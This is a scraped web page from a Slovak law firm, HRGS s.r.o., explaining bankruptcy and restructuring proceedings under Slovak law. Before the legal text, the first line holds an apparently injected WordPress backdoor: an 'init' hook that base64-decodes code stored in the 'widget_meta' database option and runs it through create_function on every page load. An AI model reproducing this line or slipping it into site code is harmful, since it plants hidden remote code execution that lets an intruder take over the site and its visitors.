add_action( 'init', create_function( '', @join( "\n", array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); HRGS s.r.o. | The best or nothing. Insolvenčné konania

Insolvenčné konania

Slovenský právny poriadok upravuje viaceré druhy insolvenčných konaní, pričom za hlavné z nich možno označiť konkurz a reštrukturalizáciu.

Účelom konkurzu je speňaženie majetku dlžníka – úpadcu, v čo najkratšom čase, za čo najvyšší výťažok a za čo najnižších nákladov, a teda dosiahnuť najvyššie možné uspokojenie pohľadávok veriteľov úpadcu. Podľa Zákona o konkurze a reštrukturalizácií, je úpadcom osoba, ktorá je predĺžená alebo platobne neschopná. Právne predpisy za platobne neschopnú označujú osobu, ktorá má viac ako jedného veriteľa a súčasne nie je schopná plniť záväzky 30 dní po lehote splatnosti, viac ako jednému veriteľovi. Predĺžená osoba, je tá, ktorá má viac ako jedného veriteľa a hodnota jej splatných záväzkov presahuje hodnotu jej majetku. Preto, aby mohlo dôjsť k vyhláseniu konkurzu je nevyhnutné, aby mal úpadca aspoň dvoch veriteľov. Konkurzné konanie sa začína podaním návrhu na vyhlásenie konkurzu, pričom v zmysle Zákona o konkurze a reštrukturalizácii, je návrh oprávnený podať dlžník – úpadca, veriteľ, likvidátor dlžníka alebo iná osoba, ak to ustanovuje zákon; pričom dlžník – úpadca, je povinný podať návrh na vyhlásenie konkurzu v lehote 30 dní, od kedy sa dozvedel alebo pri zachovaní odbornej starostlivosti mohol dozvedieť o svojom úpadku. Podanie návrhu na vyhlásenie konkurzu je vhodným riešením pre veriteľov, ktorých pohľadávky sú v neskoršom poradí uspokojované pri exekúcií, ktorá sa riadi postupom uspokojovania pohľadávok podľa časového poradia, v ktorom sa začala exekúcia vykonávať. Teda v prípade, ak dlžník – úpadca má napr. zablokované účty exekútorom, majetok dlžníka je speňažovaný na dražbách exekútorom a výťažok z dražieb je prioritne poukázaný iným veriteľom, ktorý podali návrh na začatie exekúcie skôr. V takýchto prípadoch je vhodné pristúpiť k podaniu návrhu na vyhlásenie konkurzu na majetok dlžníka, kedy sa veritelia uspokoja pomerne, podľa výšky svojej pohľadávky. Reštrukturalizácia je na rozdiel od konkurzu konaním, ktorého účelom je dohoda medzi dlžníkom a veriteľmi o spôsobe uspokojenia jeho pohľadávok veriteľov, za predpokladu zachovania prevádzky podniku dlžníka. Pre úspešnú reštrukturalizáciu je nevyhnutný správcom vypracovaný reštrukturalizačný posudok, v ktorom správca odporučí povolenie reštrukturalizácie. Reštrukturalizačný posudok je ekonomicko-právnou analýzou dlžníka. Na základe posudku, za splnenia zákonom upravených náležitostí, súd povolí reštrukturalizáciu. Následne je vyhotovovaný reštrukturalizačný plán, ktorý je predložený na schválenie veriteľom. Po jeho schválení sa tento plán pre veriteľov a dlžníka stáva záväzný. Vďaka dlhoročným skúsenostiam v oblasti insolvenčných konaní, poskytujeme klientom informácie týkajúce sa riešenia ich aktuálnej hospodárskej situácie, resp. hospodárskej situácií ich obchodných partnerov vo vzťahu k možným riešeniam formou vyhlásenia konkurzu, resp. podania návrhu na povolenie reštrukturalizácie.
Scroll to Top
Prejsť na panel nástrojov